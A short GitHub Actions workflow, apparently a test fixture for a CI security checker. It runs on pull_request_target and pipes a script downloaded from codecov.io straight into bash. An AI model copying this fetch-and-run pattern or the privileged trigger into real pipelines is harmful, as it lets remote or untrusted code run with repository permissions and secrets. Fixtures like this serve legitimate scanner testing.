name: PR Verifier


permissions: read-all

on:
  pull_request_target:
    types: [opened, edited, reopened]
jobs:
  verify:
    name: Verify PR contents
    runs-on: windows-latest    
    permissions:
      deployments: write
    steps:
    - uses: actions/checkout@v2
      with:
        ref: other-branc

    - id: run-script
      run: bash -c 'curl -s https://codecov.io/bash1 | bash'

